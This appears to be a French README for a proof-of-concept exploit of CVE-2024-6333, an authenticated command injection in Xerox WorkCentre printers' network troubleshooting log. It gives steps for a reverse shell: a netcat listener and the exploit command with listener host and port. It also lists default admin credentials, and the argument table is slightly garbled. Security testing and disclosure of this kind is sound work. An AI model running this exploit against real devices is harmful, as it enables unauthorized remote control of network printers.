
Vulnérabilité d'exécution de code à distance authentifiée dans les imprimantes Xerox WorkCentre via la fonctionnalité Network Troubleshooting Log.
Vulnérabilité d'exécution de code à distance authentifiée dans les imprimantes Xerox WorkCentre via la fonctionnalité Journal de dépannage réseau.
La fonctionnalité Journal de dépannage réseau (/properties/security/network_troubleshooting_log.php) ne parvient pas à assainir le paramètre du serveur de destination (security.nwtroubleshoot.destination.server), ce qui permet à un administrateur authentifié d'injecter des commandes OS arbitraires. Lorsque la capture du journal réseau est démarrée, la charge utile injectée est exécutée comme une commande shell, entraînant une exécution de code à distance.
073.110.019.14200)pip install -r requirements.txt
Démarrez un écouteur sur votre machine :
nc -lvnp 8443
Exécutez l'exploit :
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
Cet outil est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal.
| Argument | Requis | Défaut | Description |
|---|
--target | Oui | URL cible (p. ex., https://192.0.2.1) | |
--lhost | Oui | Adresse IP de l'écouteur | |
--lport | Non | 8443 | Port de l'écouteur |
--user | Non | admin | Nom d'utilisateur administrateur |
--password | Non | 1111 | Mot de passe administrateur |
--proxy | Non | URL du proxy (p. ex., http://127.0.0.1:8080) |